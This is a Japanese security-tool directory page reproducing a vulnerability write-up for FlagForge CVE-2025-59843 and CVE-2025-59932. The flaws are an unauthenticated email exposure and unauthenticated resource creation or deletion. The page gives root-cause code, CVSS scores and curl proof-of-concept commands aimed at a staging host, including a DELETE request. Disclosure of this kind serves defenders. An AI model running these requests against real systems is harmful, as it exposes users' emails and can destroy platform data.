Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-59843-CVE-2025-59932 — FlagForge バージョン 2.0.0 から 2.3.0 における CVE。問題を修正するにはバージョン 2.3.1 にアップグレードしてください。 | Kitploit
ツール/GitHubGitHub/at0mxploit/cve-2025-59843-cve-2025-59932
脆弱性分析情報収集ウェブセキュリティペネトレーションテスト設定ミスAPIセキュリティ
GitHubat0mxploit/cve-2025-59843-cve-2025-59932

CVE-2025-59843-CVE-2025-59932

FlagForge バージョン 2.0.0 から 2.3.0 における CVE。問題を修正するにはバージョン 2.3.1 にアップグレードしてください。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
110ヶ月前未レビュー

CVE-2025-59843 & CVE-2025-59932

1. ユーザーメールアドレスの公開露出 CVE-2025-59843

対象 / 影響を受けるアプリケーション: FlagForge Web Application

APIエンドポイント: /api/user/[username]

詳細: このエンドポイントは認証なしでユーザーのメールアドレスを返します。任意のユーザー名を公開クエリできます。

根本原因 / コード参照:

root@kitploit:~
const user = await UserSchema.findOne({
  name: { $regex: new RegExp(`^${username}$`, 'i') }
}).select('name email image totalScore customBadges createdAt role');

// No authentication check is performed
email: user.email, // Exposed publicly

深刻度 (CVSS v4.0): 5.5 (Medium)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:P/CR:M/IR:L/AR:L/MAV:N/MAC:L/MAT:N/MPR:N/MUI:N/MVC:L/MVI:N/MVA:N/MSC:L/MSI:N/MSA:N/AU:Y/RE:L

影響: 攻撃者はユーザーを列挙しメールアドレスにアクセスでき、プライバシー侵害の可能性があります。

概念実証 (PoC):

root@kitploit:~
curl "https://staging.flagforge.xyz/api/user/No%20Reply"
サンプル応答:

{
  "success": true,
  "user": {
    "name": "No Reply",
    "email": "<REDACTED>",
    ...
  }
}

2. 潜在的な認証なしリソースの変更/削除 CVE-2025-59932

対象 / 影響を受けるアプリケーション: FlagForge Web Application

APIエンドポイント: /api/resources

詳細:

GET /api/resources はすべてのリソースを公開します。

コードレビューによると、POST および DELETE リクエストは認証や認可を強制していません。これらのリクエストは本番データへの影響を避けるため、ライブシステムではテストされていません。

観測されたヘッダー (OPTIONSリクエスト):

root@kitploit:~
❯ curl -i -X OPTIONS "https://staging.flagforge.xyz/api/resources"
HTTP/2 204
access-control-allow-origin: https://staging.flagforge.xyz
allow: DELETE, GET, HEAD, OPTIONS, POST
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
date: Thu, 25 Sep 2025 15:03:45 GMT
permissions-policy: geolocation=(), microphone=(), camera=(), payment=()
pragma: no-cache
referrer-policy: no-referrer
server: Vercel
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch
x-content-type-options: nosniff
x-frame-options: DENY
x-matched-path: /api/resources
x-vercel-cache: MISS
x-vercel-id: bom1::iad1::v7k72-1758812623945-4e3fad4b58b4
x-xss-protection: 1; mode=block

深刻度 (CVSS v4.0, POST/DELETEが認証されていない場合): 7.8 (High)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L/E:U/CR:M/IR:H/AR:M/MAV:N/MAC:L/MAT:N/MPR:N/MUI:N/MVC:L/MVI:H/MVA:L/MSC:L/MSI:H/MSA:L/S:N/AU:Y/RE:M/U:Red

影響: POSTまたはDELETEが認証されていない場合、攻撃者はリソースを作成または削除する可能性があり、プラットフォームの整合性に影響を与えます。

概念実証 (PoC):

root@kitploit:~
curl -X GET "https://staging.flagforge.xyz/api/resources"

これによりリソースの _id が取得できます。

root@kitploit:~
curl -X POST "https://staging.flagforge.xyz/api/resources" \
-H "Content-Type: application/json" \
-d '{"title":"Test","description":"Test","category":"Web","resourceLink":"https://example.com","uploadedBy":"tester"}'
root@kitploit:~
curl -X DELETE "https://staging.flagforge.xyz/api/resources?id=<resource-id>"

ツールをダウンロード